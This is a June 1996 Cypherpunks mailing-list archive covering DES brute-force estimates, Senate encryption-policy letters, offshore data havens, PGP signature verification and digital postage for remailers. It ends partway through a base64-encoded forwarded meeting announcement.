   Disclaimer: My opinions are my own.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Sat, 22 Jun 1996 06:03:47 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Federal Key Registration Agency
In-Reply-To: <199606210601.XAA03610@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.960621030154.14703C-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 20 Jun 1996, jim bell wrote:

> At 09:20 PM 6/20/96 -0400, Michael Froomkin wrote:
> >I have seen the text of the speech.  The wire service accounts wildly,
> >wildly exaggerate.  This is a non-story...except for AG Reno's assertion
> >that it would take the government a year to break one DES message with a
> >"supercomputer".  She presumably believes this.  We know the number for
> >known plaintext attacks, but assuming you don't have a known plaintext,
> >what's a more reasonable assumption? 
> 
> If done in parallel, on a dedicated, 200 MHz custom chip, my WAG says that 
> such a chip could try, and statistically analyze the results of 10 million 
> DES codes per second.   (it would do the decrypts on a number of parallel 
> DES blocks, and look for typical ASCII code pattern probabilities, again all 
> in parallel.)  A typical cracking system might have 100 boards of 100 such 
> chips, or perhaps a 100 billion such decrypts per second.  Checking the 
> keyspace would require 2**19 seconds, or about a half million seconds, or 6 
> days.  Average decrypt, of course, in 3 days.


For a guy that used to be in my killfile, I agree with Jim on this one.


William Knowles
erehwon@c2.org
Finger for public key



--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 22 Jun 1996 05:03:39 +0800
To: cypherpunks@toad.com
Subject: HotWired -- The Tenth Justice (6/20/96)
Message-ID: <Pine.3.89.9606210654.A13870-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


Check out today's HotWired at http://www.hotwired.com/ for the full article.

-Declan

--------------

http://www.hotwired.com/netizen/96/25/campaign_dispatch4a.html

HotWired: The Netizen
The Tenth Justice

by Brock N. Meeks (brock@well.com) and Declan McCullagh (declan@well.com)
Washington, DC, 20 June 1996

   Little known and unheralded outside judicial circles, U.S. Solicitor
   General Drew Days will soon play a key role in the continuing saga of
   the Communications Decency Act: it's now up to Days to vote thumbs up
   or down on sending the case to the Supreme Court.

   Days's decision carries enormous weight with the Supreme Court
   justices. "The solicitor general is known as the tenth justice," says
   Llew Gibbons, Temple University law fellow. "He has that much power
   before the court. It's a level of credibility nobody else has."

   Although the solicitor general - the No. 3 spot in the Department of
   Justice - is a political appointee, the job has historically been
   above politics; as Gibbons says, the solicitor general's real client
   is the Constitution. At the same time, it's a coveted position widely
   seen as a steppingstone to a seat on the Supreme Court, as it was for
   Thurgood Marshall.
   
   In addition, the job's independence allows the solicitor general to
   rule according to his understanding of constitutional law, not party
   allegiance - which is why Days's decision on the CDA will carry so
   much weight with the high court.
   
   Nonetheless, as independent and influential as Days may be, should he
   decide not to send the case on, he could still be overruled by
   Attorney General Janet Reno.

   Days has traveled this road before. Shortly after he took office in
   1993, he wrote a decision arguing that the Bush administration had
   screwed up in sending a controversial child pornography case to the
   Supreme Court. The court, having already decided to take the case,
   reversed itself and, on the strength of Days's argument, sent it back
   to the appeals court.

[...]
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sat, 22 Jun 1996 05:16:10 +0800
To: cypherpunks@toad.com
Subject: Sen. Specter and Kerry move to delay crypto legislation
Message-ID: <Pine.SUN.3.91.960621065022.12815F-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Two things:

1. The letter was copied to Mark Heilbrun, and a phone number is helpfully
provided below.
   
2. D'Amato was copied to encourage him to claim jurisdiction over part of
this legislation, yank it into the banking committee, and delay, delay,
delay. 

-Declan
declan@well.com

--------------------------------------------------------------------------
  
                          United States Senate
                     Select Committee on Intelligence
 
                             June 7, 1996
                                                   SSCI #96-2219B
 
 The Honorable Patrick J. Leahy
 United States Senator
 Senate Russell Building, Room 433
 Washington, D.C. 20510-4502
 
 Dear Pat:
 
      We write to express our concerns about legislation you have sponsored
 which would impact directly upon federal encryption policy, including export
 control policy.  Recognizing that American innovation in encryption
 technology is unequaled, we appreciate the need to balance US economic
 competitiveness with the need to safeguard national security interests.  As
 such, it is our belief that this legislation requires careful study and
 reflection and that the Senate and the Congress as a whole should proceed
 with caution until all of the implications of such an initiative are fully
 discerned.  Along these lines, it is our understanding that industry
 representatives are currently meeting with the Administration to discuss new
 policy initiatives to address this issue.  Also, both the Congress and the
 Administration have undertaken to conduct a thorough analysis of a two-year
 congressionally-mandated study on federal encryption policy that was
 facilitated by the National Research Council.  We therefore feel that your
 legislation initiative at this time is premature.
 
      We appreciate your efforts to bring some needed clarity to United
 States policy in this area and wish to keep the lines open for discussion
 and debate on this important issue.  The staff point of contact on this
 issue is our Committee Counsel, Mark Heilbrun, who can be reached at
 224-1700.
                                 Sincerely,
 Arlen Specter                                   J. Robert Kerrey
 Chairman                                        Vice-Chairman
 
 cc:  The Honorable Alfonse D'Amato
      Chairman, Senate Committee on Banking

--------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 22 Jun 1996 05:40:52 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Federal Key Registration Agency
In-Reply-To: <Pine.SUN.3.94.960620211746.20271D-100000@viper.law.miami.edu>
Message-ID: <199606211154.HAA02180@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Froomkin writes:
> I have seen the text of the speech.  The wire service accounts wildly,
> wildly exaggerate.  This is a non-story...except for AG Reno's assertion
> that it would take the government a year to break one DES message with a
> "supercomputer".  She presumably believes this.  We know the number for
> known plaintext attacks, but assuming you don't have a known plaintext,
> what's a more reasonable assumption? 

Known plaintext isn't needed for any brute force DES attack. Indeed,
our own Dave Wagner showed in a paper not that long ago how to
automate the process of detecting a good key.

The numbers in the Blaze et al paper are very realistic on this. A
year is total bull -- not even within several orders of magnitude of
accuracy.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Sat, 22 Jun 1996 07:33:26 +0800
To: "'cypherpunks@toad.com>
Subject: FW: Bashing "Wired"
Message-ID: <01BB5F54.908A60A0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



----------
From: 	Timothy C. May[SMTP:tcmay@got.net]
Sent: 	Thursday, June 20, 1996 11:19 PM
To: 	cypherpunks@toad.com
Subject: 	Bashing "Wired"

..... elided...

And notice that increasingly the "journalists" are the quoted thinkers and
strategists in important areas? Someone majors in English, starts writing
for "Netizen" or "HotWired," and the next thing you know they're debating
crypto policy with Conrad Burns and Dorothy Denning. We're in an age where
the medium truly is the message

thanks for the deconstruction on 'WiReD' - --- your last comment reminds me of Cliff Stoll's position that the Web fosters what he calls 'cacocracy' --- a community of yakking posturers with nothing to say.

I recommend his "Silicon Snake Oil" to all.
Cheers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Sat, 22 Jun 1996 07:59:43 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: Bankers, Check Your Email
In-Reply-To: <Pine.SUN.3.91.960620234855.1920A-100000@infinity.c2.org>
Message-ID: <Pine.BSI.3.91.960621093935.12292C-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 21 Jun 1996, William Knowles wrote:

> I belive you are thinking of Vince Cate's operation in Anguilla
> 
> http://www.offshore.com.ai/
> 
> Poke around his personal web page and you will find yourself calling
> your travel agent for the next plan down.  Offshore.com is the closest
> site you are going to come to that will have Sterling's 'Islands in 
> the Net' coming to mind very quickly.  There is other links to offshore
> business, corporations, lawyers, Everything you need to break free from 
> doing business in whatever country you are in now.
>  
> > Another bank offered a diplomatic passport and its related diplomatic 
> > pouches (off limits for US and other goverments) for a minimum 
> > investment. This was in the Seychilles Islands.
> 
> Seychelles, One of the few places where communism works.  Offers
> a wonderful service if you can afford it, For 1 million U.S.D. 
> You can stay in the Seychelles without worry of being extradited
> to another country, i.e. if you were the poor bastard that nearly
> crushed Barring's Bank in the U.K. and you invested here, well the
> govt would protect you from the authorites in that country (Singapore)
> 
> The Seychelles does have an Internet connection but I have yet to 
> find the providers contact e-mail address.  Some enterprising 
> hacker might want to look into this further for offering Net service
> to future residents of the Seychelles.

The offshore domain you mention would be the one. He does warn that it is 
a financial data haven, and not a criminal data haven, as you can still 
be prosecuted under their local laws for such activities. 

The Seychilles Islands is also correct. I found the article, and it is as 
you suggest. Diplomatic rights start at $10 Million investment level.

se7en




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Travis J.I. Corcoran" <tjic@OpenMarket.com>
Date: Sat, 22 Jun 1996 04:58:01 +0800
To: geoff@commtouch.co.il
Subject: Re: DCSB: Electronic Commerce: The State of the Art
In-Reply-To: <19960621090343293.AAA253@geoff>
Message-ID: <199606211415.KAA09062@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Fri Jun 21 10:14:59 1996

>  From: geoff@commtouch.co.il (geoff)
>  Date: Fri, 21 Jun 1996 12:03:48 +0300
>  
>  The signature on the message attached below did not verify.
>  
>  Please let me know if people agree that this would be a useful 
>  service, or is it inappropriate ?

I use a lisp package for emacs that I wrote to automatically verify
signatures on incoming mail, so I already see the 10% of messages
which are improperly signed displayed in a red "bad signature" font.
Thus, I'd have no need of this service.

Further, it makes philisophical/political sense to me to have
verification distributed.  Every node should be doing it's own
security.

Be aware of CC's before replying to this.

- -- 
TJIC (Travis J.I. Corcoran)  http://www.openmarket.com/personal/tjic/index.html

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
	PGP encrypted mail preferred.   Ask me about dragbar-time.el for emacs.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed by mail-secure.el 1.006 using mailcrypt
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMcqubYJYfGX+MQb5AQFP5AQAzrePx1jhIfE/iHT0abqvOPQxpQ795/vk
CEJBSNLM91S3tSFXtcTvqYWRvE8BksT6l4JqwVhmDWN8U3UV60pJVqbwoLbH3bvs
fQcPT+HxvFDknrVIvQibwpOB9Pw9PCyV1mfMkyOjsJzRTCJe7XiFT7TS0bZA+VvX
Ls0Jpjozvnk=
=0x7g
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sat, 22 Jun 1996 07:31:19 +0800
To: cypherpunks@toad.com
Subject: Re: Recipients get the postage
In-Reply-To: <adef7a0e030210043ecb@[205.199.118.202]>
Message-ID: <4qelkm$2js@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <adef7a0e030210043ecb@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
>Again, I always enjoy gedankenexperiments about digital postage. But I am
>chagrinned that nearly four years after the first remailers we are still
>operating in thought experiment mode for the most part.
>
>I believe this is because there really is very little market at this time
>for anonymous remailings. Those who mostly use remailers appear to be
>willing to use casual-grade remailers, with few of the real Chaumian
>protections. And they are not very concerned about reliablity, cover
>traffic, etc.

I disagree.  I think the main reason that postage has not appeared for
remailers is that there is no good way to integrate Chaumian cash into
applications.  Now, with two (count 'em!) libraries for ecash starting
to become available, we will hopefully see people working to put ecash
code into MUAs, remailers, etc.

   - Ian "and I'll be one of them..."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcrZx0ZRiTErSPb1AQGzpQP/eioP2bfiiwefGQgBzkyxl3E3kj/9Hpqs
/5BdtDNtq4AZFdDZxXAc7vRUlKKihWeuLACEAHJ4mjfHg7xPiz92a/rMyEcRKkZ6
pbWwsmxR9OJat4g4Y6DzVm2wXAfaQG7WCZQh2gfKxElDkM53QqslOl3BrJ7xuVOU
x2BSpwIfI4s=
=Wtwx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 22 Jun 1996 04:48:44 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Safemail
In-Reply-To: <adef550a010210048c61@[205.199.118.202]>
Message-ID: <31CA5F34.5656AEC7@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> I haven't seen this particular idea, but a general point to always bear in
> mind is that "entropy doesn't increase" (despite what you may have heard
> about that other kind of entropy....).
> 
> To wit, if there are N bits of entropy in a passphrase (or whatever is the
> basic key, be it typed in, read from a floppy, whatever), then no amount of
> deterministic crunching by a PRNG (or whatever) will increase this.
> 
> (I say "deterministic" in the sense that all parties presumably need to run
> the same PRNG and get the same output from the same "seed" (= passphrase,
> in this scheme). Thus, the PRNG cannot add additional randomness or
> entropy. Unless I am misunderstanding the proposal...)
> 
> So, if the passphrase is 22 characters, as in the "Safemail" proposal (such
> as it is), that's all that can be gotten. Period. There just aren't enough
> "places" in the space of starting points. Anyone with access to the
> algorithms used to process the 22 characters (154 bits if 7 bits are used
> for each character) can brute force search the space in a relatively short
> time. (If the later processing algorithms are supposed to be "secret," then
> of course this a cryptographic faux pas of the first magnitude, usually
> dismissed as "security through obscurity.")


Generally agreed, but I would like to mention a couple of points.  I would
argue that 154 bits of entropy is enough, but then I would also argue that
a 22 character passphrase is unlikely to generate these 154 bits of entropy.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 22 Jun 1996 04:15:49 +0800
To: Joseph Sokol-Margolis <joseph@genome.wi.mit.edu>
Subject: Re: This might be interesting...
In-Reply-To: <199606190745.JAA21883@basement.replay.com>
Message-ID: <31CA6413.61133CF4@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Joseph Sokol-Margolis wrote:
> 
> At 1:15 PM -04006/20/96, you wrote:
> > On Wed, 19 Jun 1996, Anonymous wrote:
> >
> > > Do an AltaVista Query on:
> > >
> > >     url:bmh.com crypto*
> >
> > Mmmmm.  Mmmmm.  Mmmmmm.  Looks pretty tasty.  Those boys and girls at BMH
> > obviously have fun jobs.
> >
> > Anyone have a password for this site?  The links look cool, but you can't
> > get at 'em without a password or a hack...

The /ARPA/misc directory is accessible.

 
> I guess it might be military only.

Somehow I doubt this ...


Found in http://www.bmh.com/ARPA/Development_Intro.html:

- These documents are unclassified and in draft format. They will be updated quarterly
- and issued in a final version at the time the software is validated. Please refer any
- questions, comments, or recommendations to:

I don't think these pages are anything to get excited about (although
of course it won't surprise me if some journalist gets excited)


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 22 Jun 1996 09:10:34 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Sen. Specter and Kerry move to delay crypto legislation
Message-ID: <199606211849.LAA04215@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:51 AM 6/21/96 -0700, Declan McCullagh wrote:
>Two things:
>1. The letter was copied to Mark Heilbrun, and a phone number is helpfully
>provided below.
>2. D'Amato was copied to encourage him to claim jurisdiction over part of
>this legislation, yank it into the banking committee, and delay, delay,
>delay. 
>
>-Declan
>declan@well.com

>                          United States Senate
>                     Select Committee on Intelligence
> 
>                             June 7, 1996
>                                                   SSCI #96-2219B
> 
> The Honorable Patrick J. Leahy
> United States Senator
> Senate Russell Building, Room 433
> Washington, D.C. 20510-4502
> 
> Dear Pat:
[rest of letter to Leahy deleted]


Since "everybody" is supposed to agree that the Leahy encryption bill is 
dead, dead, dead, I don't see this as being any kind of problem.  It was 
disliked by Clinton and the Denning-types, and with the exception of a short 
flurry of mistaken optimism around here, it was roundly excoriated here as 
well.  

The one thing I found disgustingly amusing was the statement from the letter:

>     Also, both the Congress and the
> Administration have undertaken to conduct a thorough analysis of a two-year
> congressionally-mandated study on federal encryption policy that was
> facilitated by the National Research Council.  We therefore feel that your
> legislation initiative at this time is premature.

They seem to have to do an "analysis" of a two-year study.  Harrummmph!
 
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 22 Jun 1996 11:05:10 +0800
To: cypherpunks@toad.com
Subject: Re: Oil Change software snoops through hard drive
Message-ID: <adf03dbc080210043817@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:17 AM 6/21/96, Alan Lewine wrote:
>But this isn't MS's RegWiz. It's capabilities sound much greater, and
>it's not clear how to opt out, etc. from the press release:
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Not buying it and not installing it would appear to be an easy way to "opt out."

(Unless the rumors are true that U.S. Programmer-General Janet Reno will
soon propose "software registration escrow," a voluntary program to meet
the legitimate needs of law enforcement by requiring the voluntary
installation of such programs as Oil Change. Know as "GAP," for "Government
Access to Programs," this system will ensure that child pornographers and
nuclear terrorists will not get access to forbidden programs.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff@commtouch.co.il (geoff)
Date: Sat, 22 Jun 1996 08:01:08 +0800
To: dcsb@ai.mit.edu
Subject: Re: DCSB: Electronic Commerce: The State of the Art
Message-ID: <19960621090343293.AAA253@geoff>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3942.1071713588.multipart/mixed"

--Boundary..3942.1071713588.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit


The signature on the message attached below did not verify.

Pronto Secure has the neat feature of doing signature checking on the 
fly. 

In the process of testing PSecure I have collected from the 
keyservers, the keys of most people on the list who pgp sign their 
messages. (Another neat feature of PSecure makes this a one click task)

I could quite easily perform the service of bouncing messages with bad 
signature back to the list.

Please let me know if people agree that this would be a useful 
service, or is it inappropriate ?

My experience over the past few months is that around 10% of all signed 
traffic on the list checks with a BAD SIGNATURE!

Geoff Klein
Pronto Secure Product Manager.



--Boundary..3942.1071713588.multipart/mixed
Content-Type: application/octet-stream; name="bin00001.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00001.bin"
Content-Description: "badsig"

UmV0dXJuLVBhdGg6IDxjeXBoZXJwdW5rcy1lcnJvcnNAdG9hZC5jb20+DQpS
ZWNlaXZlZDogZnJvbSB0b2FkLmNvbSAoWzE0MC4xNzQuMi4xXSkgYnkgYXlh
eC5jb21tdG91Y2guY28uaWwNCiAgICAgICAgICAoTmV0c2NhcGUgTWFpbCBT
ZXJ2ZXIgdjEuMSkgd2l0aCBFU01UUCBpZCBBQUEyODM7DQogICAgICAgICAg
VGh1LCAyMCBKdW4gMTk5NiAxOTozNzo1OCArMDMwMA0KUmVjZWl2ZWQ6IChm
cm9tIG1ham9yZG9tQGxvY2FsaG9zdCkgYnkgdG9hZC5jb20gKDguNy41Lzgu
Ny4zKSBpZCBHQUExMjE3MSBmb3IgY3lwaGVycHVua3Mtb3V0Z29pbmc7IFRo
dSwgMjAgSnVuIDE5OTYgMDY6NTM6MjEgLTA3MDAgKFBEVCkNClJlY2VpdmVk
OiBmcm9tIG1haWxkZWxpdmVyMy50aWFjLm5ldCAobWFpbGRlbGl2ZXIzLnRp
YWMubmV0IFsxOTkuMC42NS4xMDddKSBieSB0b2FkLmNvbSAoOC43LjUvOC43
LjMpIHdpdGggU01UUCBpZCBHQUExMjE2NiBmb3IgPGN5cGhlcnB1bmtzQHRv
YWQuY29tPjsgVGh1LCAyMCBKdW4gMTk5NiAwNjo1MzoxNCAtMDcwMCAoUERU
KQ0KUmVjZWl2ZWQ6IGZyb20gbWFpbHNlcnZlcjEudGlhYy5uZXQgKG1haWxz
ZXJ2ZXIxLnRpYWMubmV0IFsxOTkuMC42NS4yMzJdKSBieSBtYWlsZGVsaXZl
cjMudGlhYy5uZXQgKDguNi4xMi84LjcuNCkgd2l0aCBFU01UUCBpZCBKQUEy
MzMyNjsgVGh1LCAyMCBKdW4gMTk5NiAwOTo1NDowNCAtMDQwMA0KUmVjZWl2
ZWQ6IGZyb20gWzE5OS4wLjY1LjEwNV0gKEZseWluZ0Nsb3VkLnRpYWMubmV0
IFsxOTkuMC42NS4xMDVdKSBieSBtYWlsc2VydmVyMS50aWFjLm5ldCAoOC42
LjEyLzguNy40KSB3aXRoIEVTTVRQIGlkIEpBQTAwNzYxOyBUaHUsIDIwIEp1
biAxOTk2IDA5OjUzOjQ1IC0wNDAwDQpYLVNlbmRlcjogcmFoQHRpYWMubmV0
DQpNZXNzYWdlLUlkOiA8djAzMDA2ZjAwYWRlZjAzZTU2YWJlQFsxOTkuMC42
NS4xMDVdPg0KTWltZS1WZXJzaW9uOiAxLjANCkNvbnRlbnQtVHlwZTogdGV4
dC9wbGFpbjsgY2hhcnNldD0idXMtYXNjaWkiDQpEYXRlOiBUaHUsIDIwIEp1
biAxOTk2IDA5OjQ5OjAxIC0wNDAwDQpUbzogZGNzYkBhaS5taXQuZWR1DQpG
cm9tOiBSb2JlcnQgSGV0dGluZ2EgPHJhaEBzaGlwd3JpZ2h0LmNvbT4NClN1
YmplY3Q6IERDU0I6IEVsZWN0cm9uaWMgQ29tbWVyY2U6IFRoZSBTdGF0ZSBv
ZiB0aGUgQXJ0DQpTZW5kZXI6IG93bmVyLWN5cGhlcnB1bmtzQHRvYWQuY29t
DQpQcmVjZWRlbmNlOiBidWxrDQoNCi0tLS0tQkVHSU4gUEdQIFNJR05FRCBN
RVNTQUdFLS0tLS0NCg0KDQoNCg0KICAgICAgICAgICAgICAgICBUaGUgRGln
aXRhbCBDb21tZXJjZSBTb2NpZXR5IG9mIEJvc3Rvbg0KDQogICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgUHJlc2VudHMNCg0KICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICBQZXRlciBMb3NoaW4sDQogICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICBBdXRob3Igb2YNCiAgICAgICAgICBFbGVjdHJv
bmljIENvbW1lcmNlOiBPbmxpbmUgT3JkZXJpbmcgYW5kIERpZ2l0YWwgTW9u
ZXkNCg0KDQogICAgICAgICAgICAgICAgIkVsZWN0cm9uaWMgQ29tbWVyY2U6
IFRoZSBTdGF0ZSBvZiB0aGUgQXJ0Ig0KDQoNCiAgICAgICAgICAgICAgICAg
ICAgICAgIFR1ZXNkYXksIEp1bmUgMiwgMTk5Ng0KICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgIDEyIC0gMiBQTQ0KICAgICAgICAgICAgICAgICAg
IFRoZSBEb3dudG93biBIYXJ2YXJkIENsdWIgb2YgQm9zdG9uDQogICAgICAg
ICAgICAgICAgICAgICBPbmUgRmVkZXJhbCBTdHJlZXQsIEJvc3RvbiwgTUEN
Cg0KDQpQZXRlIExvc2hpbiBoYXMgYmVlbiB3cml0aW5nIGFib3V0IG5ldHdv
cmtpbmcsIHRoZSBJbnRlcm5ldCBhbmQgZWxlY3Ryb25pYw0KY29tbWVyY2Ug
Zm9yIHRoZSBwYXN0IHR3byB5ZWFyczsgYmVmb3JlIHRoYXQgaGUgd29ya2Vk
IGFzIGEgVENQL0lQDQpuZXR3b3JraW5nIGVuZ2luZWVyIGZvciBhIENhbWJy
aWRnZSByZXNlYXJjaCBsYWIgYW5kIHN5c3RlbXMgbWFuYWdlciBmb3IgYQ0K
bWFqb3IgcHVibGlzaGluZyBjb21wYW55LiAgQm9va3MgY3VycmVudGx5IGF2
YWlsYWJsZSBpbmNsdWRlIF9FbGVjdHJvbmljDQpDb21tZXJjZTogT25saW5l
IE9yZGVyaW5nIGFuZCBEaWdpdGFsIE1vbmV5XyBhbmQgX1RDUC9JUCBmb3Ig
RXZlcnlvbmVfLg0KUGV0ZSBwbGFucyB0byBsYXVuY2ggYW4gSW50ZXJuZXQg
Y29tbWVyY2UgbmV3c2xldHRlciB0aGlzIGZhbGwuDQoNCg0KVGhlIGZ1dHVy
ZSBhbHdheXMgbG9va3Mgc2hpbmllciwgbW9yZSBlZmZpY2llbnQgYW5kIG1v
cmUgcGxlYXNhbnQgdGhhbiB0aGUNCnByZXNlbnQuICBUaGUgc2FtZSBob2xk
cyB0cnVlIGZvciB0aGUgZnV0dXJlIG9mIGVsZWN0cm9uaWMgY29tbWVyY2Us
IGJ1dCBhDQpsb3Qgb2YgcGVvcGxlIGFyZSBub3Qgd2FpdGluZyBmb3IgdGhl
IGNsZWFuIGFuZCBicmlnaHQgZnV0dXJlIG9mIFNFVCBhbmQNCnVucmVzdHJp
Y3RlZCBjcnlwdG8uICBUaGV5IGFyZSBkb2luZyBidXNpbmVzcyByaWdodCBu
b3csIG92ZXIgdGhlIEludGVybmV0LA0KYW5kIHdoYXQgdGhleSBkbyB3aWxs
IGFmZmVjdCB0aGUgd2F5IHdlIGRvIGJ1c2luZXNzIHdlbGwgaW50byB0aGUg
bmV4dA0KY2VudHVyeS4gIEVsZWN0cm9uaWMgY29tbWVyY2UgaXMgc3RpbGwg
bGFyZ2VseSBhbiBhcnQsIGFuZCBhZnRlciBsdW5jaCBvbg0KTW9uZGF5IEp1
bHkgMiBQZXRlIHdpbGwgdGFsayBhIGxpdHRsZSBiaXQgYWJvdXQgdGhlIHN0
YXRlIG9mIHRoYXQgYXJ0Lg0KDQoNCg0KVGhpcyBtZWV0aW5nIG9mIHRoZSBE
aWdpdGFsIENvbW1lcmNlIFNvY2lldHkgb2YgQm9zdG9uIHdpbGwgYmUgaGVs
ZCBvbg0KVHVlc2RheSwgSnVseSAyLCAxOTk2IGZyb20gMTJwbSAtIDJwbSBh
dCB0aGUgRG93bnRvd24gQnJhbmNoIG9mIHRoZQ0KSGFydmFyZCBDbHViIG9m
IEJvc3RvbiwgT25lIEZlZGVyYWwgU3RyZWV0LiBUaGUgcHJpY2UgZm9yIGx1
bmNoIGlzICQyNy41MC4NClRoaXMgcHJpY2UgaW5jbHVkZXMgbHVuY2gsIHJv
b20gcmVudGFsLCBhbmQgdGhlIHNwZWFrZXIncyBsdW5jaC4gOy0pLiAgVGhl
DQpIYXJ2YXJkIENsdWIgKmRvZXMqIGhhdmUgZHJlc3MgY29kZTogamFja2V0
cyBhbmQgdGllcyBmb3IgbWVuLCBhbmQNCiJhcHByb3ByaWF0ZSBidXNpbmVz
cyBhdHRpcmUiIGZvciB3b21lbi4NCg0KV2UgbmVlZCB0byByZWNlaXZlIGEg
Y29tcGFueSBjaGVjaywgb3IgbW9uZXkgb3JkZXIsIChvciBpZiB3ZSAqcmVh
bGx5KiBrbm93DQp5b3UsIGEgcGVyc29uYWwgY2hlY2spIHBheWFibGUgdG8g
IlRoZSBIYXJ2YXJkIENsdWIgb2YgQm9zdG9uIiwgYnkNClNhdHVyZGF5LCBK
dW5lIDI5LCBvciB5b3Ugd29uJ3QgYmUgb24gdGhlIGxpc3QgZm9yIGx1bmNo
LiAgQ2hlY2tzDQpwYXlhYmxlIHRvIGFueW9uZSBlbHNlIGJ1dCBUaGUgSGFy
dmFyZCBDbHViIG9mIEJvc3RvbiB3aWxsIGhhdmUgdG8gYmUgc2VudA0KYmFj
ay4NCg0KQ2hlY2tzIHNob3VsZCBiZSBzZW50IHRvIFJvYmVydCBIZXR0aW5n
YSwgNDQgRmFycXVoYXIgU3RyZWV0LCBCb3N0b24sDQpNYXNzYWNodXNldHRz
LCAwMjEzMS4gQWdhaW4sIHRoZXkgKm11c3QqIGJlIG1hZGUgcGF5YWJsZSB0
byAiVGhlIEhhcnZhcmQNCkNsdWIgb2YgQm9zdG9uIi4NCg0KSWYgYW55b25l
IGhhcyBxdWVzdGlvbnMsIG9yIGhhcyBhIHByb2JsZW0gd2l0aCB0aGVzZSBh
cnJhbmdlbWVudHMgKFdlJ3ZlIGhhZA0KdG8gd29yayB3aXRoIGdsYWNpYWwg
QS9QIGRlcGFydG1lbnRzIG1vcmUgdGhhbiBvbmNlLCBmb3IgaW5zdGFuY2Up
LCBwbGVhc2UNCmxldCB1cyBrbm93IHZpYSBlLW1haWwsIGFuZCB3ZSdsbCBz
ZWUgaWYgd2UgY2FuIHdvcmsgc29tZXRoaW5nIG91dC4NCg0KUGxhbm5lZCBz
cGVha2VycyBmb3IgdGhlIGZvbGxvd2luZyBmZXcgbW9udGhzIGFyZToNCg0K
IEF1Z3VzdCAgICAgIER1YW5lIEhld2l0dCAgICAgSWRlYSBGdXR1cmVzDQog
U2VwdGVtYmVyICAgVGF0c3VvIFRhbmFrYSAgICBTb21lIEVjb25vbWljcyBv
ZiBEaWdpdGFsIENhc2gNCg0KV2UgYXJlIGFjdGl2ZWx5IHNlYXJjaGluZyBm
